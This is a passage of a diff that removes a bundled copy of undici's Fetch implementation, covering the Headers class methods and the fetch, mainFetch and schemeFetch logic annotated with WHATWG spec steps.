{ header: 'Headers.set' }) - - name = webidl.converters.ByteString(name) - value = webidl.converters.ByteString(value) - - // 1. Normalize value. - value = headerValueNormalize(value) - - // 2. If name is not a header name or value is not a - // header value, then throw a TypeError. - if (!isValidHeaderName(name)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value: name, - type: 'header name' - }) - } else if (!isValidHeaderValue(value)) { - throw webidl.errors.invalidArgument({ - prefix: 'Headers.set', - value, - type: 'header value' - }) - } - - // 3. If this’s guard is "immutable", then throw a TypeError. - // 4. Otherwise, if this’s guard is "request" and name is a - // forbidden header name, return. - // 5. Otherwise, if this’s guard is "request-no-cors" and - // name/value is not a no-CORS-safelisted request-header, - // return. - // 6. Otherwise, if this’s guard is "response" and name is a - // forbidden response-header name, return. - // Note: undici does not implement forbidden header names - if (this[kGuard] === 'immutable') { - throw new TypeError('immutable') - } else if (this[kGuard] === 'request-no-cors') { - // TODO - } - - // 7. Set (name, value) in this’s header list. - // 8. If this’s guard is "request-no-cors", then remove - // privileged no-CORS request headers from this - this[kHeadersList].set(name, value) - } - - // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie - getSetCookie () { - webidl.brandCheck(this, Headers) - - // 1. If this’s header list does not contain `Set-Cookie`, then return « ». - // 2. Return the values of all headers in this’s header list whose name is - // a byte-case-insensitive match for `Set-Cookie`, in order. - - const list = this[kHeadersList].cookies - - if (list) { - return [...list] - } - - return [] - } - - // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine - get [kHeadersSortedMap] () { - if (this[kHeadersList][kHeadersSortedMap]) { - return this[kHeadersList][kHeadersSortedMap] - } - - // 1. Let headers be an empty list of headers with the key being the name - // and value the value. - const headers = [] - - // 2. Let names be the result of convert header names to a sorted-lowercase - // set with all the names of the headers in list. - const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) - const cookies = this[kHeadersList].cookies - - // 3. For each name of names: - for (let i = 0; i < names.length; ++i) { - const [name, value] = names[i] - // 1. If name is `set-cookie`, then: - if (name === 'set-cookie') { - // 1. Let values be a list of all values of headers in list whose name - // is a byte-case-insensitive match for name, in order. - - // 2. For each value of values: - // 1. Append (name, value) to headers. - for (let j = 0; j < cookies.length; ++j) { - headers.push([name, cookies[j]]) - } - } else { - // 2. Otherwise: - - // 1. Let value be the result of getting name from list. - - // 2. Assert: value is non-null. - assert(value !== null) - - // 3. Append (name, value) to headers. - headers.push([name, value]) - } - } - - this[kHeadersList][kHeadersSortedMap] = headers - - // 4. Return headers. - return headers - } - - keys () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key' - ) - } - - values () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'value' - ) - } - - entries () { - webidl.brandCheck(this, Headers) - - if (this[kGuard] === 'immutable') { - const value = this[kHeadersSortedMap] - return makeIterator(() => value, 'Headers', - 'key+value') - } - - return makeIterator( - () => [...this[kHeadersSortedMap].values()], - 'Headers', - 'key+value' - ) - } - - /** - * @param {(value: string, key: string, self: Headers) => void} callbackFn - * @param {unknown} thisArg - */ - forEach (callbackFn, thisArg = globalThis) { - webidl.brandCheck(this, Headers) - - webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) - - if (typeof callbackFn !== 'function') { - throw new TypeError( - "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." - ) - } - - for (const [key, value] of this) { - callbackFn.apply(thisArg, [value, key, this]) - } - } - - [Symbol.for('nodejs.util.inspect.custom')] () { - webidl.brandCheck(this, Headers) - - return this[kHeadersList] - } -} - -Headers.prototype[Symbol.iterator] = Headers.prototype.entries - -Object.defineProperties(Headers.prototype, { - append: kEnumerableProperty, - delete: kEnumerableProperty, - get: kEnumerableProperty, - has: kEnumerableProperty, - set: kEnumerableProperty, - getSetCookie: kEnumerableProperty, - keys: kEnumerableProperty, - values: kEnumerableProperty, - entries: kEnumerableProperty, - forEach: kEnumerableProperty, - [Symbol.iterator]: { enumerable: false }, - [Symbol.toStringTag]: { - value: 'Headers', - configurable: true - } -}) - -webidl.converters.HeadersInit = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (V[Symbol.iterator]) { - return webidl.converters['sequence>'](V) - } - - return webidl.converters['record'](V) - } - - throw webidl.errors.conversionFailed({ - prefix: 'Headers constructor', - argument: 'Argument 1', - types: ['sequence>', 'record'] - }) -} - -module.exports = { - fill, - Headers, - HeadersList -} - - -/***/ }), - -/***/ 4881: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -// https://github.com/Ethan-Arrowood/undici-fetch - - - -const { - Response, - makeNetworkError, - makeAppropriateNetworkError, - filterResponse, - makeResponse -} = __nccwpck_require__(7823) -const { Headers } = __nccwpck_require__(554) -const { Request, makeRequest } = __nccwpck_require__(8359) -const zlib = __nccwpck_require__(9796) -const { - bytesMatch, - makePolicyContainer, - clonePolicyContainer, - requestBadPort, - TAOCheck, - appendRequestOriginHeader, - responseLocationURL, - requestCurrentURL, - setRequestReferrerPolicyOnRedirect, - tryUpgradeRequestToAPotentiallyTrustworthyURL, - createOpaqueTimingInfo, - appendFetchMetadata, - corsCheck, - crossOriginResourcePolicyCheck, - determineRequestsReferrer, - coarsenedSharedCurrentTime, - createDeferredPromise, - isBlobLike, - sameOrigin, - isCancelled, - isAborted, - isErrorLike, - fullyReadBody, - readableStreamClose, - isomorphicEncode, - urlIsLocal, - urlIsHttpHttpsScheme, - urlHasHttpsScheme -} = __nccwpck_require__(2538) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const assert = __nccwpck_require__(9491) -const { safelyExtractBody } = __nccwpck_require__(1472) -const { - redirectStatusSet, - nullBodyStatus, - safeMethodsSet, - requestBodyHeader, - subresourceSet, - DOMException -} = __nccwpck_require__(1037) -const { kHeadersList } = __nccwpck_require__(2785) -const EE = __nccwpck_require__(2361) -const { Readable, pipeline } = __nccwpck_require__(2781) -const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) -const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) -const { TransformStream } = __nccwpck_require__(5356) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { webidl } = __nccwpck_require__(1744) -const { STATUS_CODES } = __nccwpck_require__(3685) -const GET_OR_HEAD = ['GET', 'HEAD'] - -/** @type {import('buffer').resolveObjectURL} */ -let resolveObjectURL -let ReadableStream = globalThis.ReadableStream - -class Fetch extends EE { - constructor (dispatcher) { - super() - - this.dispatcher = dispatcher - this.connection = null - this.dump = false - this.state = 'ongoing' - // 2 terminated listeners get added per request, - // but only 1 gets removed. If there are 20 redirects, - // 21 listeners will be added. - // See https://github.com/nodejs/undici/issues/1711 - // TODO (fix): Find and fix root cause for leaked listener. - this.setMaxListeners(21) - } - - terminate (reason) { - if (this.state !== 'ongoing') { - return - } - - this.state = 'terminated' - this.connection?.destroy(reason) - this.emit('terminated', reason) - } - - // https://fetch.spec.whatwg.org/#fetch-controller-abort - abort (error) { - if (this.state !== 'ongoing') { - return - } - - // 1. Set controller’s state to "aborted". - this.state = 'aborted' - - // 2. Let fallbackError be an "AbortError" DOMException. - // 3. Set error to fallbackError if it is not given. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 4. Let serializedError be StructuredSerialize(error). - // If that threw an exception, catch it, and let - // serializedError be StructuredSerialize(fallbackError). - - // 5. Set controller’s serialized abort reason to serializedError. - this.serializedAbortReason = error - - this.connection?.destroy(error) - this.emit('terminated', error) - } -} - -// https://fetch.spec.whatwg.org/#fetch-method -function fetch (input, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) - - // 1. Let p be a new promise. - const p = createDeferredPromise() - - // 2. Let requestObject be the result of invoking the initial value of - // Request as constructor with input and init as arguments. If this throws - // an exception, reject p with it and return p. - let requestObject - - try { - requestObject = new Request(input, init) - } catch (e) { - p.reject(e) - return p.promise - } - - // 3. Let request be requestObject’s request. - const request = requestObject[kState] - - // 4. If requestObject’s signal’s aborted flag is set, then: - if (requestObject.signal.aborted) { - // 1. Abort the fetch() call with p, request, null, and - // requestObject’s signal’s abort reason. - abortFetch(p, request, null, requestObject.signal.reason) - - // 2. Return p. - return p.promise - } - - // 5. Let globalObject be request’s client’s global object. - const globalObject = request.client.globalObject - - // 6. If globalObject is a ServiceWorkerGlobalScope object, then set - // request’s service-workers mode to "none". - if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { - request.serviceWorkers = 'none' - } - - // 7. Let responseObject be null. - let responseObject = null - - // 8. Let relevantRealm be this’s relevant Realm. - const relevantRealm = null - - // 9. Let locallyAborted be false. - let locallyAborted = false - - // 10. Let controller be null. - let controller = null - - // 11. Add the following abort steps to requestObject’s signal: - addAbortListener( - requestObject.signal, - () => { - // 1. Set locallyAborted to true. - locallyAborted = true - - // 2. Assert: controller is non-null. - assert(controller != null) - - // 3. Abort controller with requestObject’s signal’s abort reason. - controller.abort(requestObject.signal.reason) - - // 4. Abort the fetch() call with p, request, responseObject, - // and requestObject’s signal’s abort reason. - abortFetch(p, request, responseObject, requestObject.signal.reason) - } - ) - - // 12. Let handleFetchDone given response response be to finalize and - // report timing with response, globalObject, and "fetch". - const handleFetchDone = (response) => - finalizeAndReportTiming(response, 'fetch') - - // 13. Set controller to the result of calling fetch given request, - // with processResponseEndOfBody set to handleFetchDone, and processResponse - // given response being these substeps: - - const processResponse = (response) => { - // 1. If locallyAborted is true, terminate these substeps. - if (locallyAborted) { - return Promise.resolve() - } - - // 2. If response’s aborted flag is set, then: - if (response.aborted) { - // 1. Let deserializedError be the result of deserialize a serialized - // abort reason given controller’s serialized abort reason and - // relevantRealm. - - // 2. Abort the fetch() call with p, request, responseObject, and - // deserializedError. - - abortFetch(p, request, responseObject, controller.serializedAbortReason) - return Promise.resolve() - } - - // 3. If response is a network error, then reject p with a TypeError - // and terminate these substeps. - if (response.type === 'error') { - p.reject( - Object.assign(new TypeError('fetch failed'), { cause: response.error }) - ) - return Promise.resolve() - } - - // 4. Set responseObject to the result of creating a Response object, - // given response, "immutable", and relevantRealm. - responseObject = new Response() - responseObject[kState] = response - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = response.headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Resolve p with responseObject. - p.resolve(responseObject) - } - - controller = fetching({ - request, - processResponseEndOfBody: handleFetchDone, - processResponse, - dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici - }) - - // 14. Return p. - return p.promise -} - -// https://fetch.spec.whatwg.org/#finalize-and-report-timing -function finalizeAndReportTiming (response, initiatorType = 'other') { - // 1. If response is an aborted network error, then return. - if (response.type === 'error' && response.aborted) { - return - } - - // 2. If response’s URL list is null or empty, then return. - if (!response.urlList?.length) { - return - } - - // 3. Let originalURL be response’s URL list[0]. - const originalURL = response.urlList[0] - - // 4. Let timingInfo be response’s timing info. - let timingInfo = response.timingInfo - - // 5. Let cacheState be response’s cache state. - let cacheState = response.cacheState - - // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. - if (!urlIsHttpHttpsScheme(originalURL)) { - return - } - - // 7. If timingInfo is null, then return. - if (timingInfo === null) { - return - } - - // 8. If response’s timing allow passed flag is not set, then: - if (!response.timingAllowPassed) { - // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. - timingInfo = createOpaqueTimingInfo({ - startTime: timingInfo.startTime - }) - - // 2. Set cacheState to the empty string. - cacheState = '' - } - - // 9. Set timingInfo’s end time to the coarsened shared current time - // given global’s relevant settings object’s cross-origin isolated - // capability. - // TODO: given global’s relevant settings object’s cross-origin isolated - // capability? - timingInfo.endTime = coarsenedSharedCurrentTime() - - // 10. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 11. Mark resource timing for timingInfo, originalURL, initiatorType, - // global, and cacheState. - markResourceTiming( - timingInfo, - originalURL, - initiatorType, - globalThis, - cacheState - ) -} - -// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing -function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { - if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { - performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) - } -} - -// https://fetch.spec.whatwg.org/#abort-fetch -function abortFetch (p, request, responseObject, error) { - // Note: AbortSignal.reason was added in node v17.2.0 - // which would give us an undefined error to reject with. - // Remove this once node v16 is no longer supported. - if (!error) { - error = new DOMException('The operation was aborted.', 'AbortError') - } - - // 1. Reject promise with error. - p.reject(error) - - // 2. If request’s body is not null and is readable, then cancel request’s - // body with error. - if (request.body != null && isReadable(request.body?.stream)) { - request.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } - - // 3. If responseObject is null, then return. - if (responseObject == null) { - return - } - - // 4. Let response be responseObject’s response. - const response = responseObject[kState] - - // 5. If response’s body is not null and is readable, then error response’s - // body with error. - if (response.body != null && isReadable(response.body?.stream)) { - response.body.stream.cancel(error).catch((err) => { - if (err.code === 'ERR_INVALID_STATE') { - // Node bug? - return - } - throw err - }) - } -} - -// https://fetch.spec.whatwg.org/#fetching -function fetching ({ - request, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseEndOfBody, - processResponseConsumeBody, - useParallelQueue = false, - dispatcher // undici -}) { - // 1. Let taskDestination be null. - let taskDestination = null - - // 2. Let crossOriginIsolatedCapability be false. - let crossOriginIsolatedCapability = false - - // 3. If request’s client is non-null, then: - if (request.client != null) { - // 1. Set taskDestination to request’s client’s global object. - taskDestination = request.client.globalObject - - // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin - // isolated capability. - crossOriginIsolatedCapability = - request.client.crossOriginIsolatedCapability - } - - // 4. If useParallelQueue is true, then set taskDestination to the result of - // starting a new parallel queue. - // TODO - - // 5. Let timingInfo be a new fetch timing info whose start time and - // post-redirect start time are the coarsened shared current time given - // crossOriginIsolatedCapability. - const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) - const timingInfo = createOpaqueTimingInfo({ - startTime: currenTime - }) - - // 6. Let fetchParams be a new fetch params whose - // request is request, - // timing info is timingInfo, - // process request body chunk length is processRequestBodyChunkLength, - // process request end-of-body is processRequestEndOfBody, - // process response is processResponse, - // process response consume body is processResponseConsumeBody, - // process response end-of-body is processResponseEndOfBody, - // task destination is taskDestination, - // and cross-origin isolated capability is crossOriginIsolatedCapability. - const fetchParams = { - controller: new Fetch(dispatcher), - request, - timingInfo, - processRequestBodyChunkLength, - processRequestEndOfBody, - processResponse, - processResponseConsumeBody, - processResponseEndOfBody, - taskDestination, - crossOriginIsolatedCapability - } - - // 7. If request’s body is a byte sequence, then set request’s body to - // request’s body as a body. - // NOTE: Since fetching is only called from fetch, body should already be - // extracted. - assert(!request.body || request.body.stream) - - // 8. If request’s window is "client", then set request’s window to request’s - // client, if request’s client’s global object is a Window object; otherwise - // "no-window". - if (request.window === 'client') { - // TODO: What if request.client is null? - request.window = - request.client?.globalObject?.constructor?.name === 'Window' - ? request.client - : 'no-window' - } - - // 9. If request’s origin is "client", then set request’s origin to request’s - // client’s origin. - if (request.origin === 'client') { - // TODO: What if request.client is null? - request.origin = request.client?.origin - } - - // 10. If all of the following conditions are true: - // TODO - - // 11. If request’s policy container is "client", then: - if (request.policyContainer === 'client') { - // 1. If request’s client is non-null, then set request’s policy - // container to a clone of request’s client’s policy container. [HTML] - if (request.client != null) { - request.policyContainer = clonePolicyContainer( - request.client.policyContainer - ) - } else { - // 2. Otherwise, set request’s policy container to a new policy - // container. - request.policyContainer = makePolicyContainer() - } - } - - // 12. If request’s header list does not contain `Accept`, then: - if (!request.headersList.contains('accept')) { - // 1. Let value be `*/*`. - const value = '*/*' - - // 2. A user agent should set value to the first matching statement, if - // any, switching on request’s destination: - // "document" - // "frame" - // "iframe" - // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` - // "image" - // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` - // "style" - // `text/css,*/*;q=0.1` - // TODO - - // 3. Append `Accept`/value to request’s header list. - request.headersList.append('accept', value) - } - - // 13. If request’s header list does not contain `Accept-Language`, then - // user agents should append `Accept-Language`/an appropriate value to - // request’s header list. - if (!request.headersList.contains('accept-language')) { - request.headersList.append('accept-language', '*') - } - - // 14. If request’s priority is null, then use request’s initiator and - // destination appropriately in setting request’s priority to a - // user-agent-defined object. - if (request.priority === null) { - // TODO - } - - // 15. If request is a subresource request, then: - if (subresourceSet.has(request.destination)) { - // TODO - } - - // 16. Run main fetch given fetchParams. - mainFetch(fetchParams) - .catch(err => { - fetchParams.controller.terminate(err) - }) - - // 17. Return fetchParam's controller - return fetchParams.controller -} - -// https://fetch.spec.whatwg.org/#concept-main-fetch -async function mainFetch (fetchParams, recursive = false) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. If request’s local-URLs-only flag is set and request’s current URL is - // not local, then set response to a network error. - if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { - response = makeNetworkError('local URLs only') - } - - // 4. Run report Content Security Policy violations for request. - // TODO - - // 5. Upgrade request to a potentially trustworthy URL, if appropriate. - tryUpgradeRequestToAPotentiallyTrustworthyURL(request) - - // 6. If should request be blocked due to a bad port, should fetching request - // be blocked as mixed content, or should request be blocked by Content - // Security Policy returns blocked, then set response to a network error. - if (requestBadPort(request) === 'blocked') { - response = makeNetworkError('bad port') - } - // TODO: should fetching request be blocked as mixed content? - // TODO: should request be blocked by Content Security Policy? - - // 7. If request’s referrer policy is the empty string, then set request’s - // referrer policy to request’s policy container’s referrer policy. - if (request.referrerPolicy === '') { - request.referrerPolicy = request.policyContainer.referrerPolicy - } - - // 8. If request’s referrer is not "no-referrer", then set request’s - // referrer to the result of invoking determine request’s referrer. - if (request.referrer !== 'no-referrer') { - request.referrer = determineRequestsReferrer(request) - } - - // 9. Set request’s current URL’s scheme to "https" if all of the following - // conditions are true: - // - request’s current URL’s scheme is "http" - // - request’s current URL’s host is a domain - // - Matching request’s current URL’s host per Known HSTS Host Domain Name - // Matching results in either a superdomain match with an asserted - // includeSubDomains directive or a congruent match (with or without an - // asserted includeSubDomains directive). [HSTS] - // TODO - - // 10. If recursive is false, then run the remaining steps in parallel. - // TODO - - // 11. If response is null, then set response to the result of running - // the steps corresponding to the first matching statement: - if (response === null) { - response = await (async () => { - const currentURL = requestCurrentURL(request) - - if ( - // - request’s current URL’s origin is same origin with request’s origin, - // and request’s response tainting is "basic" - (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || - // request’s current URL’s scheme is "data" - (currentURL.protocol === 'data:') || - // - request’s mode is "navigate" or "websocket" - (request.mode === 'navigate' || request.mode === 'websocket') - ) { - // 1. Set request’s response tainting to "basic". - request.responseTainting = 'basic' - - // 2. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s mode is "same-origin" - if (request.mode === 'same-origin') { - // 1. Return a network error. - return makeNetworkError('request mode cannot be "same-origin"') - } - - // request’s mode is "no-cors" - if (request.mode === 'no-cors') { - // 1. If request’s redirect mode is not "follow", then return a network - // error. - if (request.redirect !== 'follow') { - return makeNetworkError( - 'redirect mode cannot be "follow" for "no-cors" request' - ) - } - - // 2. Set request’s response tainting to "opaque". - request.responseTainting = 'opaque' - - // 3. Return the result of running scheme fetch given fetchParams. - return await schemeFetch(fetchParams) - } - - // request’s current URL’s scheme is not an HTTP(S) scheme - if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { - // Return a network error. - return makeNetworkError('URL scheme must be a HTTP(S) scheme') - } - - // - request’s use-CORS-preflight flag is set - // - request’s unsafe-request flag is set and either request’s method is - // not a CORS-safelisted method or CORS-unsafe request-header names with - // request’s header list is not empty - // 1. Set request’s response tainting to "cors". - // 2. Let corsWithPreflightResponse be the result of running HTTP fetch - // given fetchParams and true. - // 3. If corsWithPreflightResponse is a network error, then clear cache - // entries using request. - // 4. Return corsWithPreflightResponse. - // TODO - - // Otherwise - // 1. Set request’s response tainting to "cors". - request.responseTainting = 'cors' - - // 2. Return the result of running HTTP fetch given fetchParams. - return await httpFetch(fetchParams) - })() - } - - // 12. If recursive is true, then return response. - if (recursive) { - return response - } - - // 13. If response is not a network error and response is not a filtered - // response, then: - if (response.status !== 0 && !response.internalResponse) { - // If request’s response tainting is "cors", then: - if (request.responseTainting === 'cors') { - // 1. Let headerNames be the result of extracting header list values - // given `Access-Control-Expose-Headers` and response’s header list. - // TODO - // 2. If request’s credentials mode is not "include" and headerNames - // contains `*`, then set response’s CORS-exposed header-name list to - // all unique header names in response’s header list. - // TODO - // 3. Otherwise, if headerNames is not null or failure, then set - // response’s CORS-exposed header-name list to headerNames. - // TODO - } - - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (request.responseTainting === 'basic') { - response = filterResponse(response, 'basic') - } else if (request.responseTainting === 'cors') { - response = filterResponse(response, 'cors') - } else if (request.responseTainting === 'opaque') { - response = filterResponse(response, 'opaque') - } else { - assert(false) - } - } - - // 14. Let internalResponse be response, if response is a network error, - // and response’s internal response otherwise. - let internalResponse = - response.status === 0 ? response : response.internalResponse - - // 15. If internalResponse’s URL list is empty, then set it to a clone of - // request’s URL list. - if (internalResponse.urlList.length === 0) { - internalResponse.urlList.push(...request.urlList) - } - - // 16. If request’s timing allow failed flag is unset, then set - // internalResponse’s timing allow passed flag. - if (!request.timingAllowFailed) { - response.timingAllowPassed = true - } - - // 17. If response is not a network error and any of the following returns - // blocked - // - should internalResponse to request be blocked as mixed content - // - should internalResponse to request be blocked by Content Security Policy - // - should internalResponse to request be blocked due to its MIME type - // - should internalResponse to request be blocked due to nosniff - // TODO - - // 18. If response’s type is "opaque", internalResponse’s status is 206, - // internalResponse’s range-requested flag is set, and request’s header - // list does not contain `Range`, then set response and internalResponse - // to a network error. - if ( - response.type === 'opaque' && - internalResponse.status === 206 && - internalResponse.rangeRequested && - !request.headers.contains('range') - ) { - response = internalResponse = makeNetworkError() - } - - // 19. If response is not a network error and either request’s method is - // `HEAD` or `CONNECT`, or internalResponse’s status is a null body status, - // set internalResponse’s body to null and disregard any enqueuing toward - // it (if any). - if ( - response.status !== 0 && - (request.method === 'HEAD' || - request.method === 'CONNECT' || - nullBodyStatus.includes(internalResponse.status)) - ) { - internalResponse.body = null - fetchParams.controller.dump = true - } - - // 20. If request’s integrity metadata is not the empty string, then: - if (request.integrity) { - // 1. Let processBodyError be this step: run fetch finale given fetchParams - // and a network error. - const processBodyError = (reason) => - fetchFinale(fetchParams, makeNetworkError(reason)) - - // 2. If request’s response tainting is "opaque", or response’s body is null, - // then run processBodyError and abort these steps. - if (request.responseTainting === 'opaque' || response.body == null) { - processBodyError(response.error) - return - } - - // 3. Let processBody given bytes be these steps: - const processBody = (bytes) => { - // 1. If bytes do not match request’s integrity metadata, - // then run processBodyError and abort these steps. [SRI] - if (!bytesMatch(bytes, request.integrity)) { - processBodyError('integrity mismatch') - return - } - - // 2. Set response’s body to bytes as a body. - response.body = safelyExtractBody(bytes)[0] - - // 3. Run fetch finale given fetchParams and response. - fetchFinale(fetchParams, response) - } - - // 4. Fully read response’s body given processBody and processBodyError. - await fullyReadBody(response.body, processBody, processBodyError) - } else { - // 21. Otherwise, run fetch finale given fetchParams and response. - fetchFinale(fetchParams, response) - } -} - -// https://fetch.spec.whatwg.org/#concept-scheme-fetch -// given a fetch params fetchParams -function schemeFetch (fetchParams) { - // Note: since the connection is destroyed on redirect, which sets fetchParams to a - // cancelled state, we do not want this condition to trigger *unless* there have been - // no redirects. See https://github.com/nodejs/undici/issues/1776 - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams) && fetchParams.request.redirectCount === 0) { - return Promise.resolve(makeAppropriateNetworkError(fetchParams)) - } - - // 2. Let request be fetchParams’s request. - const { request } = fetchParams - - const { protocol: scheme } = requestCurrentURL(request) - - // 3. Switch on request’s current URL’s scheme and run the associated steps: - switch (scheme) { - case 'about:': { - // If request’s current URL’s path is the string "blank", then return a new response - // whose status message is `OK`, header list is « (`Content-Type`, `text/html;charset=utf-8`) », - // and body is the empty byte sequence as a body. - - // Otherwise, return a network error. - return Promise.resolve(makeNetworkError('about scheme is not supported')) - } - case 'blob:': { - if (!resolveObjectURL) { - resolveObjectURL = (__nccwpck_require__(4300).resolveObjectURL) - } - - // 1. Let blobURLEntry be request’s current URL’s blob URL entry. - const blobURLEntry = requestCurrentURL(request) - - // https://github.com/web-platform-tests/wpt/blob/7b0ebaccc62b566a1965396e5be7bb2bc06f841f/FileAPI/url/resources/fetch-tests.js#L52-L56 - // Buffer.resolveObjectURL does not ignore URL queries. - if (blobURLEntry.search.length !== 0) { - return Promise.resolve(makeNetworkError('NetworkError when attempting to fetch resource.')) - } - - const blobURLEntryObject = resolveObjectURL(blobURLEntry.toString()) - - // 2. If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s - // object is not a Blob object, then return a network error. - if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { - return Promise.resolve(makeNetworkError('invalid method')) - } - - // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. - const bodyWithType = safelyExtractBody(blobURLEntryObject) - - // 4. Let body be bodyWithType’s body. - const body = bodyWithType[0] - - // 5. Let length be body’s length, serialized and isomorphic encoded. - const length = isomorphicEncode(`${body.length}`) - - // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. - const type = bodyWithType[1] ?? '' - - // 7. Return a new response whose status message is `OK`, header list is - // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. - const response = makeResponse({ - statusText: 'OK', - headersList: [ - ['content-length', { name: 'Content-Length', value: length }], - ['content-type', { name: 'Content-Type', value: type }] - ] - }) - - response.body = body - - return Promise.resolve(response) - } - case 'data:': { - // 1. Let dataURLStruct be the result of running the - // data: URL processor on request’s current URL. - const currentURL = requestCurrentURL(request) - const dataURLStruct = dataURLProcessor(currentURL) - - // 2. If dataURLStruct is failure, then return a - // network error. - if (dataURLStruct === 'failure') { - return Promise.resolve(makeNetworkError('failed to fetch the data URL')) - } - - // 3. Let mimeType be dataURLStruct’s MIME type, serialized. - const mimeType = serializeAMimeType(dataURLStruct.mimeType) - - // 4. Return a response whose status message is `OK`, - // header list is « (`Content-Type`, mimeType) », - // and body is dataURLStruct’s body as a body. - return Promise.resolve(makeResponse({ - statusText: 'OK', - headersList: [ - ['content-type', { name: 'Content-Type', value: mimeType }] - ], - body: safelyExtractBody(dataURLStruct.body)[0] - })) - } - case 'file:': { - // For now, unfortunate as it is, file URLs are left as an exercise for the reader. - // When in doubt, return a network error. - return Promise.resolve(makeNetworkError('not implemented... yet...')) - } - case 'http:': - case 'https:': { - // Return the result of running HTTP fetch given fetchParams. - - return httpFetch(fetchParams) - .catch((err) => makeNetworkError(err)) - } - default: { - return Promise.resolve(makeNetworkError('unknown scheme')) - } - } -} - -// https://fetch.spec.whatwg.org/#finalize-response -function finalizeResponse (fetchParams, response) { - // 1. Set fetchParams’s request’s done flag. - fetchParams.request.done = true - - // 2, If fetchParams’s process response done is not null, then queue a fetch - // task to run fetchParams’s process response done given response, with - // fetchParams’s task destination. - if (fetchParams.processResponseDone != null) { - queueMicrotask(() => fetchParams.processResponseDone(response)) - } -} - -// https://fetch.spec.whatwg.org/#fetch-finale -function fetchFinale (fetchParams, response) { - // 1. If response is a network error, then: - if (response.type === 'error') { - // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». - response.urlList = [fetchParams.request.urlList[0]] - - // 2. Set response’s timing info to the result of creating an opaque timing - // info for fetchParams’s timing info. - response.timingInfo = createOpaqueTimingInfo({ - startTime: fetchParams.timingInfo.startTime - }) - } - - // 2. Let processResponseEndOfBody be the following steps: - const processResponseEndOfBody = () => { - // 1. Set fetchParams’s request’s done flag. - fetchParams.request.done = true - - // If fetchParams’s process response end-of-body is not null, - // then queue a fetch task to run fetchParams’s process response - // end-of-body given response with fetchParams’s task destination. - if (fetchParams.processResponseEndOfBody != null) { - queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) - } - } - - // 3. If fetchParams’s process response is non-null, then queue a fetch task - // to run fetchParams’s process response given response, with fetchParams’s - // task destination. - if (fetchParams.processResponse != null) { - queueMicrotask(() => fetchParams.processResponse(response)) - } - - // 4. If response’s body is null, then run processResponseEndOfBody. - if (response.body == null) { - processResponseEndOfBody() - } else { - // 5. Otherwise: - - // 1. Let transformStream be a new a TransformStream. - - // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, - // enqueues chunk in transformStream. - const identityTransformAlgorithm = (chunk, controller) => { - controller.enqueue(chunk) - } - - // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm - // and flushAlgorithm set to processResponseEndOfBody. - const transformStream = new TransformStream({ - start () {}, - transform: identityTransformAlgorithm, - flush: processResponseEndOfBody - }, { - size () { - return 1 - } - }, { - size () { - return 1 - } - }) - - // 4. Set response’s body to the result of piping response’s body through transformStream. - response.body = { stream: response.body.stream.pipeThrough(transformStream) } - } - - // 6. If fetchParams’s process response consume body is non-null, then: - if (fetchParams.processResponseConsumeBody != null) { - // 1. Let processBody given nullOrBytes be this step: run fetchParams’s - // process response consume 